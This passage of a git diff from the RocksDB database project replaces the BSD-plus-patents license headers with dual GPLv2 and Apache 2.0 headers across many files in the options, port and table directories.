tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "options/options_helper.h" #include diff --git a/options/options_helper.h b/options/options_helper.h index 39916451467..b15faa74f75 100644 --- a/options/options_helper.h +++ b/options/options_helper.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/options_parser.cc b/options/options_parser.cc index 1e273383b6a..d5a3fec6ef0 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/options/options_parser.h b/options/options_parser.h index 9d2c0871599..cae3dbba9b4 100644 --- a/options/options_parser.h +++ b/options/options_parser.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/options_sanity_check.cc b/options/options_sanity_check.cc index 91f8c4d9788..d3afcc060ed 100644 --- a/options/options_sanity_check.cc +++ b/options/options_sanity_check.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/options/options_sanity_check.h b/options/options_sanity_check.h index 645a6ce1e62..118fdd208ba 100644 --- a/options/options_sanity_check.h +++ b/options/options_sanity_check.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/options/options_settable_test.cc b/options/options_settable_test.cc index 8345ec1824f..ab9989fb46f 100644 --- a/options/options_settable_test.cc +++ b/options/options_settable_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/options/options_test.cc b/options/options_test.cc index 60a63147f7f..d5eb42b0906 100644 --- a/options/options_test.cc +++ b/options/options_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/dirent.h b/port/dirent.h index 093cb1658b2..7bcc3569780 100644 --- a/port/dirent.h +++ b/port/dirent.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/likely.h b/port/likely.h index 95dd06e128d..e5ef786f2ec 100644 --- a/port/likely.h +++ b/port/likely.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/port.h b/port/port.h index 3ccc6c6eafc..13aa56d47b1 100644 --- a/port/port.h +++ b/port/port.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/port_example.h b/port/port_example.h index 2769284c93c..05b3240669d 100644 --- a/port/port_example.h +++ b/port/port_example.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/port_posix.cc b/port/port_posix.cc index 42e89f8c874..59241daff44 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/port_posix.h b/port/port_posix.h index e02224828fd..72beb0409f3 100644 --- a/port/port_posix.h +++ b/port/port_posix.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/stack_trace.cc b/port/stack_trace.cc index d2798617100..baaf140142d 100644 --- a/port/stack_trace.cc +++ b/port/stack_trace.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "port/stack_trace.h" diff --git a/port/stack_trace.h b/port/stack_trace.h index a2082ec14e8..f1d4f1febfa 100644 --- a/port/stack_trace.h +++ b/port/stack_trace.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once namespace rocksdb { diff --git a/port/sys_time.h b/port/sys_time.h index 94b367dc8ba..1e2ad0f5d6d 100644 --- a/port/sys_time.h +++ b/port/sys_time.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/util_logger.h b/port/util_logger.h index 33998f738da..a8255ad6d65 100644 --- a/port/util_logger.h +++ b/port/util_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/env_default.cc b/port/win/env_default.cc index be0c3a5702c..52a984f74ce 100644 --- a/port/win/env_default.cc +++ b/port/win/env_default.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/env_win.cc b/port/win/env_win.cc index 63484d369fc..1e7ea0cb8dc 100644 --- a/port/win/env_win.cc +++ b/port/win/env_win.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/env_win.h b/port/win/env_win.h index 0b42b5e6d3b..ce1a61d4161 100644 --- a/port/win/env_win.h +++ b/port/win/env_win.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/port/win/io_win.cc b/port/win/io_win.cc index 621d01f3068..3d2533a2efe 100644 --- a/port/win/io_win.cc +++ b/port/win/io_win.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/io_win.h b/port/win/io_win.h index e050593ef3e..2c1d5a1ea9e 100644 --- a/port/win/io_win.h +++ b/port/win/io_win.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/port_win.cc b/port/win/port_win.cc index c03a4526fb0..e5d5a44d6c7 100644 --- a/port/win/port_win.cc +++ b/port/win/port_win.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/port_win.h b/port/win/port_win.h index e72a208ac36..bbc5feec31b 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/win_logger.cc b/port/win/win_logger.cc index a037ba48692..0bace9f31f8 100644 --- a/port/win/win_logger.cc +++ b/port/win/win_logger.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/win_logger.h b/port/win/win_logger.h index fddf1d1bf54..2d44f506d1a 100644 --- a/port/win/win_logger.h +++ b/port/win/win_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/win_thread.cc b/port/win/win_thread.cc index 9c71d376a8b..e55ca7450b1 100644 --- a/port/win/win_thread.cc +++ b/port/win/win_thread.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/win_thread.h b/port/win/win_thread.h index 1d78a2f0827..993cc027316 100644 --- a/port/win/win_thread.h +++ b/port/win/win_thread.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/xpress_win.cc b/port/win/xpress_win.cc index 344a42cda60..e16ca986491 100644 --- a/port/win/xpress_win.cc +++ b/port/win/xpress_win.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/win/xpress_win.h b/port/win/xpress_win.h index c8325b10fff..5b11e7da9c6 100644 --- a/port/win/xpress_win.h +++ b/port/win/xpress_win.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/port/xpress.h b/port/xpress.h index 523245ca8e4..457025f666e 100644 --- a/port/xpress.h +++ b/port/xpress.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block.cc b/table/block.cc index 2d40c3fcede..372bbd2f0b5 100644 --- a/table/block.cc +++ b/table/block.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block.h b/table/block.h index 5ebbaeda0f7..044e076626d 100644 --- a/table/block.h +++ b/table/block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc index 3c164d50ad6..697c11a42f0 100644 --- a/table/block_based_filter_block.cc +++ b/table/block_based_filter_block.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_filter_block.h b/table/block_based_filter_block.h index c1984355954..52b79fea501 100644 --- a/table/block_based_filter_block.h +++ b/table/block_based_filter_block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_filter_block_test.cc b/table/block_based_filter_block_test.cc index 24d3a7685fa..f666ba25242 100644 --- a/table/block_based_filter_block_test.cc +++ b/table/block_based_filter_block_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index 47da7ef2c78..e87def73e7e 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h index 3b351443acd..2e860627107 100644 --- a/table/block_based_table_builder.h +++ b/table/block_based_table_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 18525147be3..4705046bfeb 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_factory.h b/table/block_based_table_factory.h index 276d3d63522..bdff00d1ee3 100644 --- a/table/block_based_table_factory.h +++ b/table/block_based_table_factory.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 67a79e94093..123e1814ab7 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index b9e900ac836..857ea56057b 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_builder.cc b/table/block_builder.cc index 8db4ab2adb4..39bfffe5118 100644 --- a/table/block_builder.cc +++ b/table/block_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_builder.h b/table/block_builder.h index 10ec74651a5..6b5297d0410 100644 --- a/table/block_builder.h +++ b/table/block_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. 